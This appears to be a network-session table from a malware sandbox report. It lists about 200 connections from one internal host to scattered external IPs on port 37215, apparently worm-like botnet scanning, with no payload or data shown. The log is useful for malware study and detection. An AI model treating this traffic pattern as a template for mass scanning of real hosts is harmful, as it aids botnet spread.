                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12291192.168.2.1346050163.84.93.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12292192.168.2.1355832101.94.140.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12293192.168.2.1345344197.41.238.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12294192.168.2.1340676155.212.84.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12295192.168.2.1355518197.221.137.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12296192.168.2.1352456222.46.39.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12297192.168.2.1350996197.154.219.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12298192.168.2.135873262.212.141.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12299192.168.2.1344416197.224.82.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12300192.168.2.1356764157.220.63.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12301192.168.2.1359362197.32.172.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12302192.168.2.134600041.51.232.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12303192.168.2.1346430197.121.85.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12304192.168.2.1345894223.146.100.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12305192.168.2.135307841.229.253.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12306192.168.2.1349324197.140.169.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12307192.168.2.1353154157.176.76.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12308192.168.2.134272440.247.240.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12309192.168.2.1360348197.117.151.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12310192.168.2.1349762157.231.186.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12311192.168.2.13569108.181.208.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12312192.168.2.1346334204.161.147.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12313192.168.2.1338764197.66.102.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12314192.168.2.133629641.27.1.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12315192.168.2.1360192197.1.72.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12316192.168.2.1356584197.95.55.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12317192.168.2.1339428197.103.80.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12318192.168.2.1355824133.168.61.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12319192.168.2.1351322157.167.116.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12320192.168.2.135379617.7.84.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12321192.168.2.1347364157.193.233.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12322192.168.2.1335576197.125.202.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12323192.168.2.133931841.67.5.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12324192.168.2.136079041.26.247.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12325192.168.2.1341590190.85.199.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12326192.168.2.134060441.248.159.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12327192.168.2.1337354157.132.230.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12328192.168.2.1358664217.77.27.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12329192.168.2.1353182157.170.38.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12330192.168.2.1353094157.72.10.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12331192.168.2.135678241.69.9.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12332192.168.2.1344010197.169.124.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12333192.168.2.133629841.217.12.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12334192.168.2.1346956197.19.96.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12335192.168.2.133458441.218.191.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12336192.168.2.1348224157.59.252.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12337192.168.2.1358676157.223.198.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12338192.168.2.1342770197.64.63.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12339192.168.2.1345206157.208.166.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12340192.168.2.1342128178.148.146.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12341192.168.2.1348224197.94.34.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12342192.168.2.134999241.110.63.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12343192.168.2.1341900157.229.146.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12344192.168.2.1354796139.69.131.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12345192.168.2.1355322197.158.139.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12346192.168.2.1336484157.195.180.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12347192.168.2.1343936197.186.228.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12348192.168.2.135563881.200.0.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12349192.168.2.1358454197.115.159.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12350192.168.2.1341560197.255.158.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12351192.168.2.1342306157.202.145.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12352192.168.2.135079241.218.246.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12353192.168.2.1344694157.168.248.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12354192.168.2.1359600197.106.164.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12355192.168.2.1348042157.146.90.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12356192.168.2.1341974197.204.139.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12357192.168.2.134513241.123.86.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12358192.168.2.135336641.176.138.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12359192.168.2.1334944111.202.110.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12360192.168.2.1338638197.76.97.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12361192.168.2.1337786157.43.46.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12362192.168.2.1354946157.140.87.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12363192.168.2.134622453.152.105.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12364192.168.2.1334126154.110.124.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12365192.168.2.135901489.60.99.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12366192.168.2.133556041.233.61.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12367192.168.2.1349560197.64.247.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12368192.168.2.134633241.202.158.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12369192.168.2.1356098194.124.217.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12370192.168.2.1337300197.213.182.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12371192.168.2.133313884.243.42.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12372192.168.2.1345294157.38.137.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12373192.168.2.1360542157.50.23.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12374192.168.2.135652041.183.32.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12375192.168.2.1344588142.250.248.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12376192.168.2.1334802189.239.182.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12377192.168.2.134303441.201.155.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12378192.168.2.135042841.18.203.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12379192.168.2.135591285.99.9.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12380192.168.2.1344878132.21.193.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12381192.168.2.1357678197.247.148.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12382192.168.2.134753241.252.121.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12383192.168.2.1345058123.225.132.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12384192.168.2.135257841.225.227.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12385192.168.2.1339194157.211.191.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12386192.168.2.135245441.33.207.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12387192.168.2.1338772201.14.139.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12388192.168.2.135445241.112.68.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12389192.168.2.1354472197.170.219.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12390192.168.2.133738041.8.213.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12391192.168.2.1338186197.32.148.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12392192.168.2.1333644197.180.147.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12393192.168.2.134042641.200.220.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12394192.168.2.133687841.141.179.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12395192.168.2.1340770170.128.33.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12396192.168.2.135925041.215.166.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12397192.168.2.134016660.0.87.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12398192.168.2.1342724197.225.121.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12399192.168.2.1345906219.132.58.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12400192.168.2.1333450165.84.68.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12401192.168.2.133564441.90.203.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12402192.168.2.1360318107.134.67.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12403192.168.2.1336842197.205.105.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12404192.168.2.1334006108.13.211.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12405192.168.2.1342600157.7.183.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12406192.168.2.1346720197.161.223.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12407192.168.2.1352468197.152.233.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12408192.168.2.1342660197.19.196.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12409192.168.2.1339042197.12.189.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12410192.168.2.1348586157.32.9.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12411192.168.2.1351330128.77.83.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12412192.168.2.1358430197.153.185.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12413192.168.2.133646641.143.37.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12414192.168.2.135204825.22.51.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12415192.168.2.1343250157.21.112.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12416192.168.2.1360994132.83.245.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12417192.168.2.1338898197.244.192.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12418192.168.2.135504241.199.195.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12419192.168.2.1356702157.161.138.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12420192.168.2.1334742197.180.51.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12421192.168.2.134194241.42.177.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12422192.168.2.134734641.9.97.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12423192.168.2.1335910197.179.185.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12424192.168.2.134633641.64.80.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12425192.168.2.1356414197.214.203.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12426192.168.2.134241291.154.247.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12427192.168.2.1339510197.19.1.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12428192.168.2.133920641.154.103.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12429192.168.2.1342696157.217.208.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12430192.168.2.1336412157.224.246.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12431192.168.2.1345220157.241.154.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12432192.168.2.135113641.82.200.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12433192.168.2.1339280212.242.11.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12434192.168.2.1336252157.4.111.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12435192.168.2.1352136203.236.170.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12436192.168.2.1336642197.80.32.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12437192.168.2.135445458.222.195.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12438192.168.2.1350278157.210.171.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12439192.168.2.133705249.252.221.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12440192.168.2.134194241.95.89.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12441192.168.2.1357224176.134.101.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12442192.168.2.1334450197.4.117.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12443192.168.2.1339858157.22.38.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12444192.168.2.1338606197.242.54.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12445192.168.2.133901441.56.234.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12446192.168.2.1353114197.169.111.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12447192.168.2.1352660165.136.52.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12448192.168.2.133315041.50.136.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12449192.168.2.134218841.217.134.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12450192.168.2.1335700157.236.75.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12451192.168.2.1348866204.239.155.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12452192.168.2.1357174178.194.20.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12453192.168.2.1349284104.156.168.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12454192.168.2.1360388159.121.69.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12455192.168.2.135699041.106.79.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12456192.168.2.1353592197.172.131.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12457192.168.2.1343634197.174.13.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12458192.168.2.135612041.240.97.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12459192.168.2.1343542197.120.207.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12460192.168.2.135029491.138.253.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12461192.168.2.1335642157.227.228.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12462192.168.2.1334854157.142.192.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12463192.168.2.1335544197.117.6.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12464192.168.2.1352516157.50.99.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12465192.168.2.1336388135.150.144.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12466192.168.2.1340106140.170.87.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12467192.168.2.133585641.231.108.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12468192.168.2.135289441.30.125.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12469192.168.2.1354234203.191.83.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12470192.168.2.1353198157.238.17.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12471192.168.2.1346036157.61.135.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12472192.168.2.1359344133.15.207.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12473192.168.2.135052041.25.58.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12474192.168.2.1360524197.97.94.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12475192.168.2.134080419.56.59.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12476192.168.2.134853641.170.87.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12477192.168.2.1350712197.71.26.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12478192.168.2.133932841.17.255.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12479192.168.2.135405841.117.118.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12480192.168.2.135370641.113.0.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12481192.168.2.1355958197.192.101.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12482192.168.2.1343344157.143.142.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12483192.168.2.135854838.27.191.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12484192.168.2.136066441.104.209.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12485192.168.2.1338114197.10.88.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12486192.168.2.1360690197.172.204.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12487192.168.2.1358704208.69.150.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12488192.168.2.133766882.207.161.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12489192.168.2.1342408197.205.201.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12490192.168.2.1352302157.35.201.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12491192.168.2.133418041.81.176.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12492192.168.2.134192841.177.204.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12493192.168.2.1355762197.118.56.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12494192.168.2.135294854.147.26.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12495192.168.2.133570641.169.187.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12496192.168.2.1347804157.37.221.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12497192.168.2.1335840197.135.12.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12498192.168.2.133516041.173.125.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12499192.168.2.135473641.194.1.22837215
                                                  TimestampBytes transferredDirectionData


